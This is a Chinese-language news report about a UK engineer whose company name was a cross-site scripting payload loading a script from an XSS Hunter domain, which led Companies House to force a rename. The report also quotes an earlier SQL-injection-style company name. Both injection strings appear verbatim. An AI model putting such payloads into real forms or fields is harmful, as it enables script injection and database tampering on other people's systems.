使用 HTML 代码作为公司名称,登记局易被攻击:被迫更换
英国公司注册处
Companies House的发言人表示,公司名称中含有HTML代码中所使用的字符可能会带来安全风险。
后来意识到可能会带来安全隐患后,已迫使这家公司更改名称。
这家公司由一名英国软件工程师创建,最初的名称是““><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD”。
更改后的名称是“THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD”,
翻译过来就是“名称中过去含有HTML脚本标记的那家公司”。
该工程师表示,他之所以取“><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD这个名称,纯粹是由于自己觉得这对他公司的咨询业务而言是个“有趣又好玩的名称”。
他现在表示,他起初没有意识到Companies House实际上很容易受到他使用的名为“跨站点脚本”这种极其简单的技术的攻击,跨站点脚本让攻击者可以在一个网站上运行来自另一个网站的代码。
如果名称以引号和V形图案开头,任何无法正确处理HTML代码的网站都会误以为这个公司名称是空的,然后从XSS Hunter网站加载并执行脚本,该网站可帮助开发人员找到跨站脚本错误。
该脚本原来只是会发出无害的警报,但它相当于证明了恶意攻击者可以改而利用同样的漏洞作为入口点,以达到更具破坏性的目的。
过去已经注册过类似的名称,比如“; DROP TABLE “COMPANIES”;-- LTD”,这是企图执行一种名为SQL注入攻击的攻击(灵感源自著名的XKCD网络漫画),但这是第一个引起反响的此类名称。Companies House已追根溯源,从其数据库中删除了这个原始名称,所有引用该原始名称的文档现在都简单地标为“可根据要求提供的公司名称”。
标签:
